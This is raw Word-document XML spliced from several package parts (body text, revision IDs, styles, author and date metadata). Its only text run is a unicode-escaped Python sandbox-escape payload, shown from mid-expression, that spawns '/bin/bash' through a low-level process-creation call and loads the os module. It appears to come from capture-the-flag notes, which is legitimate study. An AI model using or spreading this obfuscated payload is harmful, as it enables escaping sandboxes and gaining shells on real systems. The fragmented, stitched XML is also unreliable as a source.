        <w:t>u0030\u005d\u005d\u002c\u0020\u005b\u0062\u0022\u002f\u0062\u0069\u006e\u002f\u0062\u0061\u0073\u0068\u0022\u005d\u002c\u0020\u0054\u0072\u0075\u0065\u002c\u0020\u0028\u0029\u002c\u0020\u004e\u006f\u006e\u0065\u002c\u0020\u004e\u006f\u006e\u0065\u002c\u0020\u002d\u0031\u002c\u0020\u002d\u0031\u002c\u0020\u002d\u0031\u002c\u0020\u002d\u0031\u002c\u0020\u002d\u0031\u002c\u0020\u002d\u0031\u002c\u0020\u002a\u0028\u0061\u0028\u0029\u005b\u006a\u005d\u002e\u006c\u006f\u0061\u0064\u005f\u006d\u006f\u0064\u0075\u006c\u0065\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0070\u0069\u0070\u0065\u0028\u0029\u0029\u002c\u0020\u0046\u0061\u006c\u0073\u0065\u002c\u0020\u0046\u0061\u006c\u0073\u0065\u002c\u0046\u0061\u006c\u0073\u0065\u002c\u0020\u004e\u006f\u006e\u0065\u002c\u0020\u004e\u006f\u006e\u0065\u002c\u0020\u004e\u006f\u006e\u0065\u002c\u0020\u002d\u0031\u002c\u0020\u004e\u006f\u006e\u0065\u002c\u0020\u0046\u0061\u006c\u0073\u0065\u0029\u0029\u000a\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u003a\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0070\u0061\u0073\u0073\u000a\u0020\u0020\u0020\u0020\u0065\u0078\u0063\u0065\u0070\u0074\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0061\u0073\u0020\u0065\u003a\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u006b\u0020\u003d\u0020\u0065\u002e\u006f\u0062\u006a\u0023</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FD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33"/>
    <w:rsid w:val="000479DA"/>
    <w:rsid w:val="003005E9"/>
    <w:rsid w:val="004A0524"/>
    <w:rsid w:val="00641CC9"/>
    <w:rsid w:val="006F63EC"/>
    <w:rsid w:val="00757230"/>
    <w:rsid w:val="00763D4A"/>
    <w:rsid w:val="008B661B"/>
    <w:rsid w:val="00A45B3F"/>
    <w:rsid w:val="00A57F69"/>
    <w:rsid w:val="00AE5C33"/>
    <w:rsid w:val="00C423E3"/>
    <w:rsid w:val="00C6418B"/>
    <w:rsid w:val="00CB5F74"/>
    <w:rsid w:val="00DB3CC4"/>
    <w:rsid w:val="00EF7389"/>
    <w:rsid w:val="00F73CA2"/>
    <w:rsid w:val="00F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5EC7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3675BCA2-6531-4E03-949F-125B36D2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C3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5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C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C3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C3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C3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C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C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C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C3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E5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C3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C3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C3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C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C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C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C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C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C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5C3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6418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6418B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C6418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6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127.0.0.1:55935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善国 唐</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>善国 唐</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-05T07:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-05T08:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>